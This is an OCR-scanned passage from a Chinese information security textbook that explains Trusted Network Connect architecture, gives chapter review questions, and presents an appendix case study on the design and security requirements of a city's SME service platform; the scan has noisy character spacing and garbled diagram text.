并 评估 AR 的 完整 性 。 完 整 性 度量 层 收集 和 校 验 AR 的 完整 性 相关 信息 。 
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TNC 中 的 3 个 实体 分 别 是 访问 请 求 者 (Access Requestor, AR) 策略 执行 点 (Policy 
Enforcement Point,PEP) 和 策略 决策 点 (Policy Decision Point, PDP)。 其 中 AR 发 出 访 
问 请 求 ,收集 平 台 完 整 性 可 信 信 息 ,发送 给 PDP, 申 请 建立 网 络 连接 ;PDP 根据 本 地 安全 
策略 对 AR 的 访问 请 求 进行 决策 判定 ,判定 依据 包括 AR 的 身份 与 AR 的 平台 完整 性 状 
态 , 判 定 结果 为 允许 /禁止 /隔离 ;PEP 控制 对 被 保护 网 络 的 访问 ,执行 PDP 的 访问 控制 
决策 。 

其 中 ,AR 包括 3 个 组 件 : 网 络 访问 请 求 者 (Network Access Requestor, NAR) 发 出 
访问 请 求 ,申请 建立 网 络 连接 ,在 一 个 AR 中 可 以 有 多 个 NAR; TNC 客户 端 (TNC 
Client,TNCC) 收 集 完 整 性 度量 收集 器 (Integrity Measurement Collector,IMC) 的 完整 性 
测量 信息 ,同时 测量 并 报告 平台 和 IMC 自身 的 完整 性 信息 ;IMC 测量 AR 中 各 个 组 件 的 
完整 性 ,在 一 个 AR 上 可 以 有 多 个 不 同 的 IMC。 

PDP 也 包括 3 个 组 件 : 网 络 访问 授权 者 (Network Access Authority, NAA) 对 AR 
的 网 络 访问 请 求 进行 决策 。NAA 可 以 咨询 上 层 的 可 信和 网络 连接 服务 器 (Trusted 
Network Connection Server,TNCS) 来 确定 AR 的 完整 性 状态 是 否 与 PDP 的 安全 策略 一 
致 ,从 而 决定 AR 的 访问 请 求 是 否 被 允许 ;TNCS 负责 与 TNCC 之 间 的 通信 ,收集 来 自 完 
整 性 度量 验证 器 (Integrity Measurement Verifier,IMV) 的 决策 ,形成 一 个 全 局 的 访问 决 
策 传递 给 NAA;IMYV 将 IMC 传递 过 来 的 AR 各 个 部 件 的 完整 性 测量 信息 进行 验证 ,并 
给 出 访问 决策 意见 。 

TNC 开创 性 地 提出 了 将 可 信 计 算 机 制 引 入 网 络 , 引 起 了 国内 外 研究 者 对 此 更 加 深入 
和 广泛 的 研究 。 国 际 上 主要 有 思科 网 络 准 入 控制 系统 (NAC) 、 微 软 网 络 访问 保护 (NAP) 
等 解决 方案 。 思 科 推 出 的 网 络 接 入 控制 NAC 方案 的 优势 在 于 网 络 设备 的 接 入 控制 和 监 
控 。 微 软 推 出 的 网 络 访问 保护 NAP 方案 的 优势 在 于 终端 安全 状态 评估 和 监控 。 我 国学 
者 基于 TNC 架构 也 开展 了 可 信 网 络 连接 的 研究 工作 ,如 中 科 院 软件 所 TCA 实验 室 提出 
了 一 种 平台 匿名 网 络 接 人 控制 系统 架构 ,解决 了 TNC 终端 平台 接 和 人 网 络 时 的 身份 隐私 
问题 。 

此 外 , 现 有 的 网 络 安全 协议 ,如 SSL 协议 .TLS 协议 和 IPSec 协议 ,只 能 实现 终端 接 
入 可 信 网 络 时 的 用 户 身 份 认证 ,保证 网 络 通信 数据 的 机 密 性 和 完整 性 ,无 法 实现 终端 完整 
性 的 认证 。 针 对 该 问题 IBM 研究 院 、 德 国 波 鸿 鲁 尔 大 学 等 ,提出 了 将 终端 完整 性 证 明 扩 
展 到 SSL 协议 的 方案 ,终端 可 以 在 SSL 协议 中 证 明 平台 配置 状态 ,建立 与 可 信和 网 络 之 间 
的 可 信 信 道 。 


13.4 本 章 小 结 


本 章 从 量子 密码 大 数据 安全 与 隐私 保护 、 可 信 计 算 三 个 方面 阐述 信息 安全 的 新 技 
术 。 在 量子 密码 方面 ,从 量子 密码 技术 和 量子 通信 技术 两 个 角度 介绍 量子 密码 的 基本 概 
念 ,以 及 国内 外 量子 密码 的 发 展 情况 ;在 大 数据 安全 与 隐私 保护 方面 ,介绍 当前 大 数据 所 
面临 的 主要 安全 威胁 ,同时 介绍 了 当前 主要 的 数据 安全 与 隐私 保护 技术 ;在 可 信 计 算 方 
面 , 介 绍 了 可 信 计 算 的 思想 及 体系 结构 :以 及 可 信 网 络 连接 的 基础 架构 。 
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思 考 题 
. 简 述 量子 信息 技术 的 出 现 给 经 典 密码 带 来 哪些 威胁 。 


. 说 明 量子 隐形 传 态 的 含义 。 

.当前 大 数据 面临 哪些 安全 与 隐私 问题 ?7 有 哪些 主要 的 威胁 ? 
. 请 简 述 当 前 大 数据 安全 与 隐私 主要 的 保护 技术 。 

什么 是 可 信 ? 什么 是 信任 根 ? 什么 是 信任 链 ? 

. 请 简 述 可 信 计 算 的 思想 。 

. 请 简 述 可 信 网 络 连接 结构 。 


| 昌 录 | 


案例 : H 市 中 小 企业 服务 平台 建设 方案 


案例 学 习 要 点 : 
如 了 解 信 息 化 建设 的 背景 与 需求 ; 
名 明确 所 面临 的 信息 安全 问题 。 


A.1 系统 概述 


近年 来 , 随 着 电子 政务 的 普及 ,政府 部 门 职能 正 从 管理 型 向 管理 服务 型 转变 ,基于 互 
联网 的 政府 信息 化 平台 成 为 政府 工作 的 主要 渠道 。 

H 市 中 小 企业 服务 平台 建设 的 目标 是 以 持续 增强 政府 中 小 企业 服务 能 力 为 目标 ,以 
现 有 信息 化 资源 优化 配置 为 主线 ,以 共享 机 制 建设 为 核心 ,按照 整合、 集成. 共享、 提升 ” 
的 基本 思路 ,立足 当地 的 特点 和 产业 特色 ,充分 运用 现代 信息 技术 .整合 和 优化 技术 资源 ， 
搭建 布局 合理 ,技术 先进 、 功 能 完备 、 运 行 高 效 的 中 小 企业 服务 平台 ,促进 各 类 信息 资源 的 
良性 互动 ,提高 中 小 企业 服务 的 科学 性 和 规范 化 ,形成 信息 资源 共享 机 制 ,为 全 市 的 中 小 
企业 服务 工作 提供 有 力 支撑 。 

中 小 企业 服务 平台 建设 在 确保 信息 安全 的 基础 上 ,以 中 小 企业 服务 办 事 应 用 为 核心 ， 
实现 文件 下 达 、 通 知 下 发 ,政策 发 布 , 信 息 上 报 、 项 目 申报 ,资料 登记 ,工作 沟通 等 应 用 。 其 
特点 是 除了 可 以 在 电脑 上 办 公 , 还 可 以 在 移动 设备 (手机 、PAD 等 ) 上 实现 随时 随地 办 公 。 

通过 中 小 企业 服务 平台 建设 连接 各 县 区 相关 管理 部 门 和 所 属 中 小 型 工业 企业 等 组 
织 。 打 造 三 级 应 用 的 信息 服务 云 平台 ,提高 信息 流转 时 效 性 和 服务 工作 办 理 效率 ,提供 易 
用 适用 的 移动 化 网 络 化 电子 办 公 环 境 。 


A.2 系统 建设 原则 


A21 总 体 规 划 、 分 步 实施 原则 


系统 建设 不 追求 一 步 到 位 、 大 而 全 的 建设 方案 ,而 是 采取 整体 规划 、 分 布 实施 、 稳 健 操 
作 、 适 度 优化 的 原则 。 先 解决 最 关键 最 核心 的 需求 问题 ,在 取得 阶段 性 成 果 的 情况 下 再 进 
行 推进 和 扩展 。 
A22 安全 可 靠 原则 

在 系统 设计 中 ,充分 考虑 了 系统 的 安全 性 和 可 靠 性 ,采用 多 种 安全 防范 技术 和 措施 ， 
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保障 系统 的 信息 安全 ,保障 系统 长 期 稳定 可 靠 运 行 。 图 A-1 显示 用 户 访问 系统 的 过 程 。 


防 病毒 应 用 数据 库 
系统 服务 器 服务 器 


防火 墙 
系统 


安全 
网 闸 
ae ey 
ss ~ 
2 一 
安全 传输 使 用 人 员 


图 A-1 用 户 访问 系统 


系统 安全 保密 原则 主要 体现 以 下 几 方 面 : 

(1) 设备 安全 : 系统 可 通过 双 机 热 备 、 异 地 备份 .硬件 防火 墙 \ 安 全 网 曾 等 提供 系统 
的 安全 可 靠 性 ,保证 硬件 设备 的 正常 运行 。 

(2) 权限 控制 : 系统 根据 分 层 管理 的 原则 进行 权限 控制 ,提供 严格 的 机 密 性 、 身 份 认 
证 ,访问 控制 ,数字 签名 等 措施 ,权限 均 实行 单 向 向 下 管理 ,确保 保密 性 、 完 整 性 和 可 用 性 。 

(3) 软件 安全 : 在 运行 环境 方面 ,系统 部 署 在 Linux 平台 ,应 用 服务 与 数据 库 分 离 部 
署 ;系统 存储 、 传 输 和 访问 均 采 用 加 密 方 式 ; 访 问 中 采用 SSL 数字 签名 和 CA 认证 技术 确 
保 系 统 安全 。 

(4) 移动 应 用 安全 : 访问 系统 的 移动 设备 需 授 权 方 可 访问 系统 (在 系统 中 绑 定 设备 
号 ), 同 时 由 电信 营运 商 提供 虚拟 安全 通道 及 专用 上 网 卡 ,移动 办 公设 备 通过 上 网 卡 只 能 
访问 系统 ,不 能 访问 互联 网 。 


A23 先进 性 原则 


在 进行 方案 系统 总 体 规划 时 ,充分 考虑 了 技术 的 发 展 方向 ,选择 目前 业界 先进 和 成 熟 
的 技术 作为 整个 系统 的 技术 架构 ,能 够 保证 系统 有 不 断 发 展 和 扩充 的 余地 。 


A24 实用 原则 


(1) 业务 管理 实用 性 : 系统 设计 和 开发 时 充分 考虑 应 用 中 数据 处 理 的 便利 和 可 行 
性 ,把 满足 服务 工作 办 理 作为 第 一 要 素 考 虑 。 符 合 我 国 的 政务 管理 模式 、 管 理 制度 、 政 策 
法 规 。 

(2) 操作 方便 实用 : 系统 采用 平台 化 的 开发 ,界面 风格 一 致 ,美观 大 方 ,操作 简便 实 
用 。 全 部 界面 操作 均 充 分 考虑 不 同 使 用 者 的 实际 需要 ,使 系统 操作 方便 、 维 护 简单 .管理 
方便 。 提 供 快捷 方式 、 流 程 导航 等 快捷 工具 、 菜 单 、 报 表 、 语 言 等 界面 元 素 符合 操作 人 员 的 
习惯 。 
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(3) 浏览 器 操作 : 操作 统一 采用 浏览 器 界面 ,操作 便捷 ,易学 易 用 。 
A25 实时 性 原则 


由 于 各 项 数据 需要 通过 网 络 及 时 地 报 送 到 系统 中 ,因此 本 系统 的 各 项 指标 响应 要 求 
实时 性 比较 高 。 系 统 设计 充分 考虑 系统 的 容量 、 网 络 带 宽 .CPU 消耗 1/O 消耗 ,关键 应 
用 场景 , 既 做 到 单 点 应 用 效率 高 ,又 做 到 并 发 下 性 能 高 ,保证 各 种 操作 模式 下 的 应 用 的 效 
果 , 达 到 实时 高 效 的 目的 ,让 操作 人 员 使 用 轻松 方便、 快捷 。 


A26 可 扩展 性 原则 


在 保障 系统 先进 性 的 同时 ,系统 建设 具有 良好 扩展 性 和 升级 能 力 的 技术 ,以 保证 系统 
技术 和 业务 的 可 扩展 性 。 

考虑 到 系统 建设 是 一 个 循序 渐进 \ 不 断 扩充 的 过 程 ,系统 采用 积木 式 结构 ,将 来 系统 
扩展 新 的 应 用 可 以 与 原 系统 进行 无 颖 连接 , 预 留 扩展 接口 。 

使 用 平台 化 技术 保证 ,系统 动态 可 扩展 。 可 以 实时 地 增加 ,减少 应 用 模块 。 

使 用 平台 化 技术 ,使 用 报表 、 表 单 、 工 作 流 、 预 警 等 基础 技术 。 能 够 非常 快速 地 构建 新 
的 应 用 。 


A27 可 维护 性 原则 


系统 建成 后 仍 需要 不 断 地 修正 和 完成 ,所 以 设计 中 充分 考虑 系统 的 可 维护 性 。 系 统 
可 维护 性 原则 主要 体现 以 下 几 个 方面 : 

(1) 系统 具备 以 参数 化 方式 配置 . 删 减 . 扩 充 、 端 口 设置 等 特点 ,能 系统 地 管理 软件 平 
台 , 系 统 地 管理 并 配置 应 用 软件 。 

(2) 应 用 软件 应 采用 耦合 ,分 层 的 设计 思想 ,可 以 根据 需要 修改 某 个 模块 ,增加 新 的 
功能 以 及 重组 系统 的 结构 以 达到 程序 可 重用 的 目的 。 

(3) 系统 提供 报表 ,流程 电子 表单 定制 工具 ,以 增强 系统 的 可 维护 性 。 

(4) 应 用 部 署 灵 活 , 客 户 化 定制 ,能 支撑 全 市 当前 应 用 和 未 来 扩展 ,满足 发 展 过 程 中 
的 组 织 扩张 制度 重建 \ 流 程 重组 等 必须 面临 的 管理 变化 。 


A.3 系统 总 体 建设 


A31 基本 功能 架构 


H 市 中 小 企业 服务 平台 应 包含 市 属相 关 部 门 、 各 个 区 县 相关 职能 部 门 、 所 属 中 小 型 
工业 企业 用 户 , 所 有 工作 人 员 都 可 以 通过 该 平台 及 时 了 解 相应 于 个 人 权限 的 信息 。 能 够 
通过 服务 平台 了 解 新 闻 文件 .政策 等 信息 ,办 理 相关 工作 文件 和 事务 ,能 够 满足 办 文 \ 办 
事 、 信 息 报 送 、 请 示 汇 报 、 通 知 下 达 、 文 件 资料 管理 ,互动 交流 移动 应 用 等 需要 。 


A32 主要 建设 内 容 
(1) 基础 信息 登记 。 在 平台 中 预 设 全 市 对 应 的 职能 管理 架构 。H 市 以 及 所 属 各 个 县 
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区 把 所 属 工业 企业 的 信息 建立 到 平台 中 , (包括 名 称 、 地 址 、 联 系 人 、 联 系 方式 、 企 业 属 性 
等 等 ) 。 

(2) 信息 上 传 下 达 。 满 足 HH 市 日 常 与 工业 企业 的 信息 互通 互联 、 文 档 的 上 传 下 达 
(包括 公文 .通知 公告 .政策 等 下 发 .统计 报表 上 报 )。 

(3) 项 目 申报 办 理 。 实 现 H 市 工业 企业 项 目的 在 线 申 报 ,网 上 进行 申报 材料 流程 ， 
支持 在 线 咨询 。 

(4) 在 线 沟通 交流 。 满 足 H 市 与 县 区 和 企业 间 在 线 沟通 的 需要 ,包括 即时 通讯 、 意 
见 箱 、 短 消息 等 。 

(5) 移动 办 公 应 用 。 借 助 信息 手段 ,实现 移动 端的 办 公 应 用 ,各 个 县 区 乡镇 、 企 业 能 
够 及 时 获取 H 市 的 相关 信息 。 


A33 基本 网 络 架 构 


系统 部 署 在 H 市 经 济 和 信息 化 委员 会 (简称 经 信 委 ) 机 房 , 接 和 人 市 经 信 委 网 站 ,连接 
到 下 属 各 区 县 乡镇 .工业 企业 等 机 构 。 使 用 人 员 通 过 市 经 信 委 网 站 登录 访问 系统 。 出 差 
人 员 使 用 移动 终端 设备 ,通过 电信 营运 商 提供 的 虚拟 专用 网 络 连 接 到 平台 ,在 移动 终端 设 
备 上 查阅 、 签 批文 件 和 事务 。 


A.4 系统 详细 设计 


A41 公文 管理 


公文 应 用 包括 发 文 管理 ,收文 管理 ,公文 督办 、 公 文 交换 公文 档案 、 公 文 查询 等 功能 ， 
如 图 A-2 所 示 。 同 时 按照 传统 办 公 习惯 实现 在 系统 中 的 手写 签 批 、 签 章 等 应 用 。 针 对 领 
导 经 常 出 差 的 情况 实现 在 移动 设备 上 的 手写 签 批 处 理 。 通 过 系统 实现 公文 收发 文 管理 及 
各 机 构 之 间 的 公文 交换 应 用 ,实现 公文 的 无 纸 化 办 公 应 用 。 

系统 提供 通过 认证 的 ,具备 国家 法 律 的 签 章 系统 ,确保 文件 有 效 性 。 系 统 支持 手写 签 
批 ,保留 领导 签 批 原始 笔迹 。 签 章 过 程 如 图 A-3 所 示 。 


A42 协同 工作 


在 日 常 工作 中 ,除了 正式 的 公文 审批 ,事务 审批 外 ,还 有 很 多 非 规范 性 的 事务 ,如 文件 
传递 .工作 交办 、 事 务 交 流 等 ,都 需要 通过 系统 来 完成 。 

在 服务 平台 中 ,通过 工作 流 构建 了 协同 工作 系统 ,每 个 工作 人 员 都 可 以 根据 工作 需 
要 ,简单 快捷 的 建立 流程 ,将 文件 .事务 和 信息 发 送 到 有 关 人 员 ,流程 可 以 是 一 对 一 、 一 对 
多 ,也 可 以 是 串 发 .并 发 及 复杂 流程 。 

信息 发 出 后 ,系统 自动 消息 提醒 ,有 关 人 员 收 到 信息 后 ,可 以 直接 查看 并 回复 处 理 , 处 
理 意见 即时 反馈 发 起 人 。 处 理 人 可 以 实现 以 下 操作 : 意见 填写 、 意 见 常用 请、 意见 隐藏 、 
意见 回复 、 加 签 , 减 签 .修改 正文 .修改 附件 , 回 退 终止 等 一 系列 操作 ,并 按 要 求 进行 权限 
设置 。 
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发 文 管理 发 文 单 + 公文 正文 (WORD) a | HM | 
于 稿 中 一 | 审核 | 一 -| 复核 | 一 -和 交趾 一 | 套红 | 一 | 用 印 | 一 上 寺 妆 中 

修改 贸 痕 文档 清 稿 。 文 单 等 批 对 公文 正文 套红 。 盖 章 核发 文 号 

手写 批注 。 花脸 保存 形成 红 闫 文件 
| 人 内 多 人 

收 |- 广 

单 |- 交换 中 心 外 
收文 管理 Ey 收 图 件 一 [阅读 

收 办 件 

下 到 一 - 左 到 一 - 大王 一 [ 昌 档 

必 文 单 + 红头 文件 
zg 
图 A-2 公文 处 理 流程 

/A 签 章 计算 机 ) 


种 立 二 


合法 效果 


安全 散 列 算法 (SHA-1)、 


DES 加 密 算法 以 及 PKI 框 架 ) 


非法 效果 


图 A-3” 签 章 过 程 


附录 “案例 : H 市 中 小 企业 服务 平台 建设 方案 \ 四 人 
协同 功能 包括 : 


(1) 新 建 协同 : 建立 流程 ,填写 协同 内 容 和 附件 ,可 以 设置 办 理 人 权限 及 是 否 跟踪 督 

(2) 待 办 协同 : 他 人 发 来 的 协同 信息 ,统一 存放 在 待 办 协同 中 ,处 理 人 可 以 查看 和 
处 理 。 

(3) 待 发 事项 : 存储 未 发 送 的 协同 事项 ,支持 建立 ,修改 流程 ,加 载 附件 ,增加 附 言 等 
工作 。 

(4) 已 发 事项 : 查看 已 经 发 送 的 协同 事项 ,设置 ,取消 跟踪 流程 ,撤销 发 送 给 他 人 的 
信息 和 事件 。 

(5) 已 办 事项 : 查看 办 理 完毕 的 事项 ,并 对 已 经 处 理 的 协同 可 以 进行 撤回 。 

(6) 协同 管理 : 进行 协同 “ 待 办 ` 已 办 , 待 发 已 发 ,超期 "等 多 种 状态 的 统计 。 


A43 请 示 报 告 


通过 系统 ,实现 下 属 机 构 向 上 级 部 门 进行 工作 请 示 、 汇 报 等 ,领导 签 批 后 ,根据 领导 批 
示意 见 回复 申请 单位 或 转 相 关 部 门 办 理 。 


A44 信息 报 送 


信息 报 送 包 括 信息 上 报 、 审 核发 布 .期 刊 管理 ,期 刊 统计 ,评分 等 。 通 过 信息 报 送 管 
理 使 各 部 门 工 作 动态 .工作 思路 .工作 总 结 得 到 充分 交流 和 反映 ,也 成 为 领导 决策 .工作 部 
署 的 重要 科学 依据 。 


A45 办 公 桌 面 


通过 系统 ,将 传统 的 办 公 桌 上 的 事务 转换 到 了 系统 中 。 因 此 ,个 人 办 公 桌 面 的 设计 必 
须 尽 可 能 符合 办 公 习惯 ,并 且 可 以 根据 工作 需要 调整 。 
A46 互动 交流 

政府 办 公 除 了 办 文 .办 会 .办事 等 正式 沟通 方式 外 ,工作 人 员 之 间 还 需要 进行 非 正 式 
沟通 和 即时 沟通 ,以 满足 信息 交换 的 需要 。 

沟通 是 一 切 组 织 行为 的 基础 ,任何 组 织 包 含 着 大 量 因 事 而 定 的 人 与 人 之 间 的 信息 沟 
通 与 合作 ,系统 提供 在 线 呼叫 .BBS 论坛 在 线 调查 等 应 用 以 满足 工作 人 员 之 间 的 交流 
需要 。 


A47 移动 政务 应 用 


针对 领导 办 公 时 间 不 固定 , 常 外 出 ,会 议 较 多 的 情况 ,专门 设计 了 移动 办 公 应 用 。 通 
过 智能 终端 ,通过 安全 认证 后 ,在 有 手机 信号 或 Wi-Fi 的 地 方 ,可 连 上 办 公 自 动 化 系统 , 查 
看 文件 资料 ,处 理 签 批 公文 和 其 他 请 示 报 告 。 

系统 设计 为 客户 端 模式 ,这样 每 一 次 访问 的 数据 量 较 低 ,加 快 访问 速度 ,增强 系统 可 
操作 性 。 
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A48 文件 资料 管理 


通过 系统 ,建立 内 部 文件 库 ,收集 并 规范 管理 各 种 文件 资料 ,文件 资料 需要 授权 方 可 
查看 ,权限 设置 与 个 人 实际 文件 查看 权限 一 致 。 

文件 资料 中 可 以 根据 工作 需要 设置 专栏 ,将 各 种 学 习 和 宣传 资料 推送 到 工作 人 员 办 
公 桌 面 ,增强 工作 人 员 的 思想 、 理 论 和 实践 能 力 的 提升 。 


A.5 系统 的 安全 需求 


也 市 中 小 企业 服务 平台 是 一 个 典型 的 政务 信息 管理 系统 ,其 信息 安全 需要 表现 在 以 
下 几 个 方面 : 

(1) 网 络 安全 : 该 平台 是 基于 互联 网 的 ,网 络 安全 是 基础 。 其 中 涉及 物理 安全 、 防 火 
墙 , 人 侵 检测 ,无 线 网 络 安全 等 方面 。 

(2) Web 应 用 安全 : 用 户 通过 Web 应 用 访问 系统 ,同时 平台 具有 通过 移动 设备 处 理 
日 常事 务 的 功能 ,需要 具有 Web 应 用 安全 和 移动 应 用 安全 的 能 力 。 

(3) 机 密 性 : 系统 中 涉及 政府 的 机 密 信 息 、 中 小 企业 的 重要 数据 ,对 重要 的 信息 需要 
通过 加 密 机 制 保证 其 机 密 性 。 

(4) 访问 控制 : 政府 工作 人 员 、 中 小 企业 管理 人 员 和 相关 的 业务 人 员 都 需要 访问 系 
统 ,通过 这 一 平台 处 理事 务 , 因 此 不 同 的 访问 者 要 具有 不 同 的 访问 权限 。 

(5) 内 容 安 全 和 数据 备份 : 对 于 系统 中 的 数据 要 保证 其 完整 性 ,并 设计 系统 数据 备 
份 与 恢复 的 机 制 。 

(6) 数字 签名 : 用 户 通过 网 络 实现 业务 审批 ,需要 实现 数字 签名 。 

(7) 信息 安全 管理 : 系统 设计 要 符合 相关 的 信息 安全 标准 ,并 制定 相应 的 信息 安全 
制度 ,是 保证 信息 安全 技术 实现 的 基础 。 


